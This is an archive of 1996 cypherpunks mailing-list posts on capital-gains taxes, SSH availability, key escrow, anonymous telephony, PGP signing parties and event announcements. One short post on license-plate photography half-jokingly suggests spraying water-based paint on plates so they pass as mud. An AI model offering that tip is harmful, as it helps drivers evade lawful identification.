or bounced. He wouldn't charge the victim money for being attacked.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 15 Aug 1996 03:05:36 +0800
To: Bart Croughs <bart.croughs@tip.nl>
Subject: Re: National Socio-Economic Security Need for Encryption Technology
In-Reply-To: <01BB88FA.25D2E3C0@groningen16.pop.tip.nl>
Message-ID: <199608141525.LAA21133@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Bart Croughs writes:
> 
> >Nowhere in the writings of any Austrian economist will you find
> >anything claiming that the wages for a given job are linked to
> >capital investment by the employer.
> 
> I already gave some quotes of Austrian economists in another post, but =
> maybe you didn't read it, so here I go again:
> 
> 	Henry Hazlitt in 'economics in one lesson' (p. 139): "The best way to =
> raise wages, therefore, is to raise marginal labor productivity. This =
> can be done by many methods: by an increase in capital accumulation - =
                 ^^^^^^^^^^^^
> i.e. by an increase in the machines with which the workers are aided..."

You should read your own quotes.

No one claimed that you can't increase productivity and income on
average under some circumstances by increased capital investment. What
was being made fun of was the simplistic misunderstanding of what the
underlying mechanisms are. Prices, including the price of labor, are
set purely by the marketplace. Under some circumstances, incomes will
be determined by investment levels made by employers. Under others,
they will not.  The important feature is the market principle, not the
capital investment. The point of my "green pylons" posting was to note
that it is the market direction of the investment and not the
investment that is important. Impediments to trade create wastes of
capital just as surely as burning cash in the marketplace does. If you
were really an Austrian, and not a confused person, you would know
that all the Austrians and Chicago School people are for completely
free trade, something you don't seem to get in your expositions on
capital flows.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 15 Aug 1996 02:57:31 +0800
To: Sam Quigley <poodge@econ.berkeley.edu>
Subject: Re: non-secure network utilities - pointers?
In-Reply-To: <Pine.SUN.3.91.960813010527.1025D-100000@quesnay.Berkeley.EDU>
Message-ID: <199608141527.LAA21142@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Sam Quigley writes:
> What cypherpunk-approved (tm) -- that is, cryptographically strong, 
> freely available, and well-implemented (reliable) -- network utilities are 
> available?  I'm willing to agree to US-only license agreement iff I have 
> to...


Try SSH and friends -- they are a pretty good thing.

http://www.ssh.fi/, I believe.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jim Legg" <legg@sun1plus.liebert.com>
Date: Thu, 15 Aug 1996 02:56:33 +0800
To: <cypherpunks@toad.com>
Subject: Re: Schlafly on crypto
Message-ID: <9608141523.AA02130@sun1plus.liebert.com>
MIME-Version: 1.0
Content-Type: text/plain





> Subject: Clinton Is Trying to be Big Brother -- Phyllis Schlafly Column
8/8/96
> 

[snip!]

Beware when politicos speak!

Phyllis Schlafly would think nothing of trying to ban speech on the
internet when it is
something that she doesn't agree with.

-jim-





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 15 Aug 1996 03:40:47 +0800
To: Bart  Croughs <cypherpunks@toad.com>
Subject: Imprisoned Capital
Message-ID: <2.2.32.19960814153840.008802ec@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:12 PM 8/14/96 +-200, Bart  Croughs wrote:
>If investors use their capital to invest abroad, this capital cannot at the
same
> time be used to invest at home. Only after the investors decide not to invest
> abroad any more, they can invest it at home. But I was not talking about
> investors who decide to stop investing abroad and start investing at home. I
> was talking about investors who decide to invest abroad instead of at home,
> and the effect of such a decision on the wages in the US.

There is no straightforward link between amount of capital invested and
productivity or wages.  If there were, some steel plants in the Soviet Union
would have had the best paid and most productive workers on earth.
Additionally, countries which prevent capital outflows don't receive capital
inflows and thus become poorer.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 15 Aug 1996 03:51:44 +0800
To: cypherpunks@toad.com
Subject: DCSB: The Transnationality of Digital Cash
Message-ID: <v03007801ae37a4ffab57@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----BY SAFEMAIL 1.0-----



                 The Digital Commerce Society of Boston

                               Presents

                             Tatsuo Tanaka
                  Center on Japanese Economy & Business
                          Columbia University

                  "The Transnationality of Digital Cash"


                        Tuesday, September 3, 1996
                               12 - 2 PM
                   The Downtown Harvard Club of Boston
                     One Federal Street, Boston, MA



Tatsuo Tanaka is from the Center for Global Communications at the International
University of Japan. He is currently a Visiting Research Fellow at Columbia
University's Center on Japanese Economy & Business.

Government analysts like to stress the anonymity and security concerns of
digital cash, particularly money laundering and tax evasion.  However,
probably the most important economic consequence of digital cash to
nation-states is its transnationality.  Theoretically speaking, any bank
can issue digital cash any country's currency, even on a fractional reserve
basis, without permission from that nation-state's central bank, and
everybody in the world can use it as if that cash were issued by the
country itself. This unprecedented transnationality could make a country's
financial system unstable in terms of money supplies or exchange rates.
Tanaka goes through a possible scenario in which nation-states and
cyberspace conflict over the authority to issue digital cash, including a
possible resolution of the problem.


This meeting of the Digital Commerce Society of Boston will be held on
Tuesday, September 3, 1996 from 12pm - 2pm at the Downtown Branch of the
Harvard Club of Boston, One Federal Street. The price for lunch is $27.50.
This price includes lunch, room rental, and the speaker's lunch. ;-).  The
Harvard Club *does* have dress code: jackets and ties for men, and
"appropriate business attire" for women.

We need to receive a company check, or money order, (or if we *really* know
you, a personal check) payable to "The Harvard Club of Boston", by
Saturday, August 31, or you won't be on the list for lunch.  Checks
payable to anyone else but The Harvard Club of Boston will have to be sent
back.

Checks should be sent to Robert Hettinga, 44 Farquhar Street, Boston,
Massachusetts, 02131. Again, they *must* be made payable to "The Harvard
Club of Boston".

If anyone has questions, or has a problem with these arrangements (We've had
to work with glacial A/P departments more than once, for instance), please
let us know via e-mail, and we'll see if we can work something out.

Planned speakers for DCSB are:

 October     Philippe LeRoux      Stock Exchanges and the Web
 November    Philip S. Corwin     Regulatory Barriers to Internet Commerce

We are actively searching for future speakers.  If you are in Boston on the
first Tuesday of the month, and you would like to make a presentation to the
Society, please send e-mail to the DCSB Program Commmittee, care of Robert
Hettinga, rah@shipwright.com .

For more information about the Digital Commerce Society of Boston, send
"info dcsb" in the body of a message to majordomo@ai.mit.edu .  If you want
to subscribe to the DCSB e-mail list, send "subscribe dcsb" in the body of a
message to majordomo@ai.mit.edu .

Looking forward to seeing you there!

Cheers,
Robert Hettinga
Moderator,
The Digital Commerce Society of Boston


-----BEGIN PGP SIGNATURE-----BY SAFEMAIL 1.0-----
Version: 2.6.i

iQCVAwUBMhHz1/gyLN8bw6ZVAQGJlQQApgYjtBSEW+g3cF9qsO3SVF3dFn5ObPa6
WoP7nhldO2XbLgFQOsBqXWv+pUHu9aAxo2TaHFtqegCrr5eEbVutjKhFGdOCZqRT
QoFElygD3hKE7sITW6VM9hQaq37eylRapNuvMLo6Q49/BwuDYcWQSkCVQsBlKkP7
lp7JBVIHkMY=
=WlRo
-----END PGP SIGNATURE-----

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Thu, 15 Aug 1996 06:35:44 +0800
To: "'CYPHERPUNKS@toad.com>
Subject: RE: National Socio-Economic Security Need for Encryption Technology
Message-ID: <c=US%a=_%p=msft%l=RED-81-MSG-960814184543Z-30630@RED-05-IMC.itg.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


>From: 	Bart  Croughs
>
>You are wrong. I'm not in error; I don't think the US is worse off when US
> capital moves abroad. I just want to know how you can proof it, so I would
>be
> able to rebut protectionist arguments. I don't know how to prove it. And, 
>unfortunately, neither do you. Rhetoric is no proof.
...............................................

I said in my post:

>		"I think people who put up a lot of objections [...] 
		do not want any proof of their error."

Are you the one putting up the objections?  Are you the one who does not
want to see the proof which you are asking for?  I would think that
after having read Mises, Hayek, et al, the economic cause&effect
principles which they outlined would make the resulting situation pretty
clear.

   ..
Blanc

>	   
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Marc J. Wohler" <mwohler@ix.netcom.com>
Date: Thu, 15 Aug 1996 02:57:31 +0800
To: cypherpunks@toad.com
Subject: Stopped Clock. Was: Schlafly on Crypto
Message-ID: <199608141549.IAA12562@dfw-ix12.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:59 AM 8/14/96 -0400, you wrote:
>Subject: Clinton Is Trying to be Big Brother -- Phyllis Schlafly Column 8/8/96

It makes me ill to agree with Schlafly on any issue, but 'Even a stopped
clock.......


Unrepentant Liberial





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: freematt@coil.com (Matthew Gaylor)
Date: Thu, 15 Aug 1996 03:41:24 +0800
To: cypherpunks@toad.com
Subject: Thursday, 15 August: Join Matthew Gaylor in Club Wired's Electronic Frontiers Chat
Message-ID: <v0213050aae37679928be@[198.4.94.246]>
MIME-Version: 1.0
Content-Type: text/plain


Thursday, 15 August
6 p.m. PDT
Matthew Gaylor, in Electronic Frontiers

Join Gaylor and host Jon Lebkowsky on Thursday, 15 August at 6 p.m. PDT
(Friday 01:00 GMT) in Electronic Frontiers.

     http://www.hotwired.com/eff/


[Note from Matthew Gaylor: I'll be online at ClubWired discussing
cyberlibertarianism and other pro-individual rights issues. I'm sure you'll
want to join the discussion.  I hope to see you there.]


****************************************************************************
Subscribe to Freematt's Alerts: Pro-Individual Rights Issues
Send a blank message to: freematt@coil.com with the words subscribe FA
on the subject line. List is private and moderated (7-30 messages per week)
Matthew Gaylor,1933 E. Dublin-Granville Rd.,#176, Columbus, OH  43229
****************************************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Thu, 15 Aug 1996 07:49:58 +0800
To: cypherpunks@toad.com
Subject: Re: non-secure network utilities - pointers?
Message-ID: <2.2.32.19960814185533.00b17c9c@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:27 AM 8/14/96 -0400, Perry wrote:
>
>Sam Quigley writes:
>> What cypherpunk-approved (tm) -- that is, cryptographically strong, 
>> freely available, and well-implemented (reliable) -- network utilities are 
>> available?  I'm willing to agree to US-only license agreement iff I have 
>> to...
>
>
>Try SSH and friends -- they are a pretty good thing.
>
>http://www.ssh.fi/, I believe.

That is for the commercial version.  The free version (for Unix) can be
found at http://www.cs.hut.fi/ssh/ .  There is also a Windows version in
beta, as well as one for OS/2.  (There is a Mac version in development, but
no pointers on when or where it will be available.)

---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
                "Microsoft -- Nothing but NT promises."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Thu, 15 Aug 1996 10:57:04 +0800
To: Sandy Sandfort <legg@sun1plus.liebert.com>
Subject: Re: Schlafly on crypto
Message-ID: <2.2.32.19960814185535.00e17344@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:41 AM 8/14/96 -0700, Sandy Sandfort wrote:
>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>                          SANDY SANDFORT
> . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
>
>C'punks,
>
>On Wed, 14 Aug 1996, Jim Legg wrote:
>
>> Beware when politicos speak!
>
>Good advice, but...
> 
>> Phyllis Schlafly would think nothing of trying to ban speech on
>> the internet when it is something that she doesn't agree with.
>
>An interesting allegation.  I wonder if it is merely rhetoric or
>if Jim has any evidence to backup this statement?

Well, I can think of a few reasons to come to that conclusion.  

- Schlafly is the head of one of the more right-wing organizations in the
country.  

- She is very closly associated with the Buchanon campaign and the Christian
coalition.  

- Her organization, the Eagle Forum, distributes a couple of anti-porn rant
tracts (http://www.eagleforum.org/users/eagle/public_html/misc/order.html)
called _Pornography's Victims $4.95 (paperback) by Schlafly, ed._ and
_Pornography Addict (Bundy Interview)_.  (Quoting Bundy is interesting in
this context, because he never collected porn, he collected cheerleading
magazines.  His "death bed confession" was a ploy to gain publicity and
sympathy out of a gulible ant-porn zealot.)

>Does Jim know who Phyllis' son is?

I know that he is gay.  His mother seems to have had some problems coming to
terms with the implications of alot of her rhetoric involving such things...
(She seems to confuse her religion with reality on this point.)

I would say there are alot of reasons to assume that Schlafly would try and
impose her morality on the rest of the country if given half the chance.
Look at the people she chooses to associate with.

---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
                "Microsoft -- Nothing but NT promises."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: koontz@netapp.com (Dave Koontz)
Date: Thu, 15 Aug 1996 06:50:01 +0800
To: wb8foz@nrk.com
Subject: Re: photographed license plates
Message-ID: <9608141930.AA23408@supernova.netapp.com>
MIME-Version: 1.0
Content-Type: text/plain


>I note those plastic cover for plates "to keep them clean"
>seem to be more & more popular.

These are not allowed in California  (although the chance of getting
popped must be quite slim, by the number you see).

I remember seeing some water based spray paints in dun colors (such as
a nice mud tan) -  Gee, officer, its just mud, <wipe>.

(Why water colors should be in spray cans is beyond me, unless intended
for taggers).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "M. Plumb" <mp@the-wire.com>
Date: Thu, 15 Aug 1996 04:12:18 +0800
To: cypherpunks@toad.com
Subject: Toronto Signing Party (fwd)
Message-ID: <Pine.SUN.3.91.960814123204.2119A-100000@psyche.the-wire.com>
MIME-Version: 1.0
Content-Type: text/plain



---------- Forwarded message ----------
Date: Wed, 14 Aug 1996 04:10:26 -0400
From: Richard Outerbridge <outer@interlog.com>
Newgroups: alt.security.pgp
Subject: Toronto Signing Party


-----BEGIN PGP SIGNED MESSAGE-----

1996/08/14 04:01:55 EDT
Marc Plumb and I are trying to organize a "signing party"
for anyone within range of downtown Toronto.  The tentative
date is the afternoon of Saturday September 7th.  Location
will depend on the size of the crowd: so RSVP to Marc or
myself (<mp@the-wire.com> or <outer@interlog.com>) and one
of us will get back to you during the first week of September
with the precise details.  Be patient!

Richard Outerbridge

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMhGJcNNcQg4O6q8hAQE0LwP/WvmqDyLqqY28H0peWO/HJyhCInRITx7N
aCCfDYdQxjym8/AAFBHy6Luye1DpRpok0RM9OFIMVMWOFzf7Ma7hYwD2KK56IJcy
E9XDbak+DkbS/AKthxS5UXPN4Vy1VRUExxMGvXrcCIK2RvoxhT8ZbUp3pQAo/fn4
IYIHo/oTJ0Q=
=qQOf
-----END PGP SIGNATURE-----
-- 
"Just an eccentric soul with a curiosity for the bizarre."
PGPpubkey 1024/0EEAAF21 1994/07/23 <outer@interlog.com>
Fingerprint = 6A89 D49F D3DA 12E4  040A 273B F383 0127





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Thu, 15 Aug 1996 05:17:02 +0800
To: cypherpunks@toad.com
Subject: Austin, TX: RoboFest 7
Message-ID: <199608141742.MAA07179@einstein>
MIME-Version: 1.0
Content-Type: text



Hi all,

I would like to pass the follwing along. If you have any questions then
please let me know.

If you are in Austin around this time, then stop by for a spell.


                                                       Jim Choate


  --------------------------------------------------------------------------

Date: Tue, 13 Aug 96 21:38:53    
From: "Sonia Santana" <sonia@hyperweb.com>
Subject: RE:  RoboFest 7 speaking gig
To: Jim Choate <ravage@bga.com>

The dates for RoboFest 7 are Sept. 14th & 15th and it will
be held at Dobie Mall this year.  If you are interested please 
let me know or contact Glenn Currie at <currie@eden.com> who is 
actually making the schedule for our guest speakers.

There aren't any monetary perks but we plan to reward our guests
with T-shirts, videos and movie passes to our film festival.

Please let us know by August 15th if you are interested and
can make it.  Also please let us know a title or topic of your
talk. And finally how do you want to be billed in the program.


Hope you can make it.


Sonia Santana
Admin. Coordin.
The Robot Group
http://www.robotgroup.org 








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 15 Aug 1996 04:55:27 +0800
To: "cypherpunks@toad.com>
Subject: re: National Socio-Economic Security Need for Encryption    Technology
In-Reply-To: <199608141547.IAA25312@dns1.noc.best.net>
Message-ID: <v03007813ae37b263d075@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:49 AM -0400 8/14/96, James A. Donald wrote:
> Under democracy, people get the government they deserve and 
> get it good and hard.

Wasn't it DeToqueville who said something like,

"Democracy is just, because a constituency of idiots will elect one?"

;-)

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vincent L. Diaz" <vldiaz@adnc.com>
Date: Thu, 15 Aug 1996 07:45:30 +0800
To: cypherpunks@toad.com
Subject: (no subject)
Message-ID: <32122E22.E93@adnc.com>
MIME-Version: 1.0
Content-Type: text/plain

subcribe cypherpunks@toad.com vldiaz@adnc.com

end

-- 
Regards,

VINCENT L. DIAZ
U-SAVE COMMUNICATIONS
Business Line: 619-277-2411
Fax Line:         619-277-0298
http://www.cognigen.com/agencies/

Title:  www-buyinfo mail archive: (cpx) Cypherpunk recruiting opportunity









(cpx) Cypherpunk recruiting opportunity
Robert Hettinga (rah@shipwright.com)
Thu, 2 Nov 1995 18:47:43 -0500

 Messages sorted by: [ date ][ thread ][ subject ][ author ]

 Next message: Robert Hettinga: "Re: (cpx) Re: ecash remailer"
 Previous message: Robert Hettinga: "(cpx) Re: ecash remailer"


--- begin forwarded text

Date: Thu, 2 Nov 1995 17:44:03 -0500 (EST)
From: cjl <cjl@welchlink.welch.jhu.edu>
To: Cypherpunks mailing list <cypherpunks@toad.com>
Subject: Cypherpunk recruiting opportunity
Mime-Version: 1.0
Sender: owner-cypherpunks@toad.com
Precedence: bulk


C-punx,

Considering the amount of "preaching to the choir" that goes on here I
thought that the following news item might supply a more suitable outlet
for some of the more evangelical-minded Cypherpunks.  After all, it is
perfectly clear that the science of cryptography exemplifies some of the
more exciting applications of otherwise-dry mathematics, and there is
always a need for "voices of reason" in the councils of those who would
make the 'Net safe for children.

___________________

Tech Help for Schools

While high-tech education visionaries are issuing apocalyptic warnings
about the fate of the alledgedly backward US school system, a privately
sponsored group has launched a Peace Corps-style initiative to ease
schools into the 21st century.

The Massachusetts-based Tech Corps, which recruits volunteers to help
schools harness computers and telecommunications technology, announced
last month that it is going national.  The corps, whose chief sponsor is
the Cellular Telecommunications Industry Association, will hold a
conference in Washington DC on 30 October where people can learn how to
start state chapters.  Founded by Gary J. Beach, chief executive officer
of Computerworld Inc., the corps last year recruited 300 volunteers
theough the magazine Computerworld who have been working in 12 school
districts throughout Masachusetts.

Karen Smith, Tech Corps' national director, says the response to the call
for volunteers from people in industry, government agencies, and private
consulting firms, has been "incredible."  They help school districts in
any way they are asked - such as by installing wiring, training teachers,
persuading local industry to donate hardware, and helping schools
construct World Wide Web homepages.

Interested parties can reach Tech Corp' own web page at:

http://www.ustc.org



C. J. Leonard                     (    /      "DNA is groovy"
                                   \ /                - Watson & Crick
<cjl@welchlink.welch.jhu.edu>      / \     <--  major groove
                                  (    \
Finger for public key               \   )
Strong-arm for secret key             /    <--  minor groove
Thumb-screws for pass-phrase        /   )

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<



 Next message: Robert Hettinga: "Re: (cpx) Re: ecash remailer"
 Previous message: Robert Hettinga: "(cpx) Re: ecash remailer"



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 15 Aug 1996 05:42:21 +0800
To: cypherpunks@toad.com
Subject: Re: National Socio-Economic Security Need for Encryption Technology
In-Reply-To: <c=US%a=_%p=msft%l=RED-81-MSG-960813204534Z-26547@tide19.microsoft.com>
Message-ID: <199608141714.NAA01978@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



> >From: 	Bart  Croughs
> >You haven't answered this question yet. I don't claim that the U.S. is worse
> >off when US capital moves abroad. I only ask: how can you proof that the US
> >isn't worse off when US capital moves abroad? 

Simple. Keeping capital from flowing wherever it likes leads to a non-pareto
optimal state. Care to dispute that?

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Chris Adams" <adamsc@io-online.com>
Date: Thu, 15 Aug 1996 07:31:12 +0800
To: "cypherpunks" <cypherpunks@toad.com>
Subject: Re: Schlafly on crypto
Message-ID: <199608142017.NAA08295@cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain


On 14 Aug 96 09:11:30 -0800, bdolan@use.usit.net wrote:

>     Amendment guarantees our right to speak in public but not in
>     private. It would be just as ridiculous to say that we have
>     freedom to speak in words that the government can understand, but
>     not in words the government can't decipher.

This definitely does beg the question of what the FBI would ask us to do
if, for instance, the drug dealers started hiring Navajo speakers to play
"Code-talkers" over a GAKed phone...


| Chris Adams <adamsc@io-online.com> - Webpages for sale! Se habla JavaScript!
| http://www.io-online.com/adamsc/adamsc.htp
| Autoresponder: send email w/subject of "send resume" or "send PGPKEY"

 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Blossom <eb@comsec.com>
Date: Thu, 15 Aug 1996 09:41:09 +0800
To: cypherpunks@toad.com
Subject: Crypto 96 carpooling from Bay Area?
Message-ID: <199608142107.OAA13878@comsec.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi,

Anybody from the SF Bay Area interested in carpooling down to Crypto?

Eric
707-577-0409




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Robichaux <paul@ljl.COM>
Date: Thu, 15 Aug 1996 06:35:44 +0800
To: cypherpunks@toad.com
Subject: Verisign CA practices documents
Message-ID: <v03007802ae37d94706fd@[206.151.234.126]>
MIME-Version: 1.0
Content-Type: text/plain


Verisign's put their Certification Practice Statement up at
<http://www.verisign.com/repository/CPSNEW>. This document appears to set
forth the policies Verisign's implementing when it acts as a CA.

I haven't fully reviewed it yet, but my hat's off to Verisign for coming
clean and clearly stating their policies.

-Paul

--
Paul Robichaux		LJL Enterprises, Inc.
paul@ljl.com		Be a cryptography user. Ask me how.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 15 Aug 1996 09:52:04 +0800
To: cypherpunks@toad.com
Subject: Re: (Off Topic) Re: FCC_ups
Message-ID: <199608142306.QAA07654@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:45 AM 8/13/96 -0700, shamrock@netcom.com (Lucky Green) wrote:
>>The *real* challenge: how do you support sender- and recipient- anonymous
>>phone calls with strong security?  Have fun.
>
>Sender anonymous phone calls are easy. You route them through PipeNet,
>assuming every PipeNet node has a telephony gateway. Recipient anonymous
>phone calls a harder to implement.

Assuming PipeNet is a descendant of the Packet Laundry concept,
recipient-anonymous phone calls are also easy - build a meet-me box,
AKA conference bridge.  Recipient John Doe #3 reserves a conference bridge,
sends anon-email to John Doe #6 and John Doe #43, saying "meet me at
Bridge7.conference.netphone.com at midnight Zulu time, password 'foobar'"
and they all call in.  

Payment: If the conference bridge is run by a vanilla commercial
Internet-telephony service, it may want some sort of non-private payment, 
but would probably accept phone cards.  Otherwise you're stuck with credit
cards.

If it's run by an enlightened service provider or some sort of punknet,
it'll take anonymous digicash.  Maybe the host pays, maybe everybody.
Or you could digitally record the sounds of dropping quarters in a payphone :-)

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	Defuse Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Llywarch Hen <ecgwulf@postoffice.worldnet.att.net>
Date: Thu, 15 Aug 1996 10:27:57 +0800
To: cypherpunks@toad.com
Subject: Re: Capital and Taxes
Message-ID: <2.2.16.19960814232605.1a77b8fc@postoffice.worldnet.att.net>
MIME-Version: 1.0
Content-Type: text/plain



Quotes taken from recent Tim May posts here.

First we'll assume that economic benefits result in social benefits, 
otherwise what's the point?:
>And the cloud of ideas connected with somehow forcing capital investment to
>remain in the U.S....well, the best way to do this is to alter the tax laws
>so that America (for example) becomes a magnet for investment. (If one is
>looking to help America, that is.)

Now the example of how capital gains taxes hinder investment. First we'll 
portray an income tax as a property tax:
>something else that's terribly important: taxes must be paid on other
>assets sold to raise the $100K. For example, if I own shares in Intel,
>bought many years ago, I have to sell $160,000 worth of Intel stock, send a
>$60,000 check to Uncle Sam and Uncle Pete . . .

But this was an income tax. The capital gains are taxed at a rate less than 
earned wages and are free of the regressive social security and FICA taxes. 
Tim really doesn't want to pay his fair share, and here's the reason:
>. . . . . . . . . . . . . . . . . . . . .  and then send the remaining
>$100,000 to my friends. If the new investment *doubles*, my $100,000 gain
>is taxed at 38% and I'm left with a gain of about $62,000.
>It doesn't take a number theorist to see that I may as well have not even
>bothered. So long as I just sit on the Intel stock, no taxes are owed.
>Sounds like a no brainer to me.

Yep, we've adopted the fuzziest-headed of liberal ideas in promoting 
government as an agent of change to improve things for Tim and his pals by 
asking wage earners to subsidize his economic activities by distributing the 
costs to the public so he can enjoy the profits. But this is just the result 
of the massive jobs program whose beneficiaries prefer to call the Cold War, 
MAD, and so on. The most Keynesian solution of the century combined with a 
not so subtle transfer of wealth from the poor to the rich and renamed 
'supply-side' so its clients don't have to admit they have been on welfare 
for the last twelve or fifteen years. Combined with a massive twelve-year 
capital bull market in which it would have been difficult to lose money, we 
have a class of people who have confused personal wealth with personal merit 
and the notion that they did it on their own.

Is this simple dishonesty masquerading as intellectual dishonesty or just 
standard innocent and dim-witted Republican-Libertarian opportunism 
buttressed by quotations from free-market theologians?
>. . .
>huge "backlog" of unrealized capital gains (aka gains on paper, but not yet
>taxable) is what is being spoken of when people like Jack Kemp and Steve
>Forbes speak of "unleashing" the capital gains now tied up due to the high
>tax rates.

>Personally, I favor open borders--but no public schooling, no tax-funded
>handouts, no welfare, no child support, no public hospitals, etc.
This supposes that Tim paid the workers hired to clear brush from his land 
enough so that they could afford private schooling and excellent health 
care.

Two more quotes and from different sources.

The aristocratic complaint is quoted in Amabel William-Ellis and
F.J. Fisher, M.A., _The Story of English Life_:
"The world goeth from bad to worse when shepherd and cowherd
demand more for their labor than the master-bailiff was wont to take
in days gone by. Laborers of old were not wont to eat of wheaten
bread; their meat was of beans and coarser corn, and their drink of
water alone. Cheese and milk were a feast to them; their dress was
of hodden grey; then was the world ordered aright for folk of this
sort. Ha! age of ours, whither turnest thou? For the poor and small
folk, who should cleave to their labor, demand to be better fed than
their masters."

A widely published remark made by Mr. George Soros:
"Economic history is a never-ending series of episodes based on 
falsehoods and lies, not truths. It represents the path to big 
money. The object is to recognize that trend whose premise is 
false, ride that trend, and step off before it is discredited."

-- Llywarch Hen





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Hopper <ghopper@frbphil.org>
Date: Thu, 15 Aug 1996 07:39:39 +0800
To: cypherpunks@toad.com
Subject: Capital and Taxes
Message-ID: <199608142030.QAA25012@mail.voicenet.com>
MIME-Version: 1.0
Content-Type: text/plain


When you consider that capital gains tax rate schedules are not indexed for
inflation, the situation's even worse than Tim's analysis implies.  Since
you pay tax on the nominal rather than the real capital gain, the effective
capital gains tax rate is really higher than the quoted rate.  
----------------------------------------------------------------------
Greg Hopper			|Disclaimer:  The opinions expressed are	 
Research Department		|my own and not necessarily those of 
Federal Reserve Bank		|the Federal Reserve Bank of Philadelphia
of Philadelphia			|or the Federal Reserve System.
10 Independence Mall		|
Philadelphia, PA 19106		|
(215) 574-3905 (voice)		|
(215) 574-4364 (fax)		|
email: ghopper@frbphil.org	|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas R. Floyd" <dfloyd@io.com>
Date: Thu, 15 Aug 1996 08:46:46 +0800
To: jimbell@pacifier.com (jim bell)
Subject: Re: key escrow idea from David Satelin of MIT Lincoln Labs
In-Reply-To: <199608141555.IAA00344@mail.pacifier.com>
Message-ID: <199608142138.QAA04243@xanadu.io.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> You may say, of course, "that's not how they currently interpet it," but my 
> response is simple:  Any talk of tolerating any sort of key-escrow (GAK) 
> system must presume that the people running it are no more honest than they 
> are today.  If the cops (and the government in general) so generously 
> misinterprets the government's "rights" with regard to wiretapping, there is 
> simply no reason to believe that any restrictions they claim to be willing 
> to respect now will actually be followed once such a plan is approved.  
> Don't try to get out of this:  You can't ignore past abuses.  And if they 
> were willing to do illegal taps before 1968, this tells you how inclined 
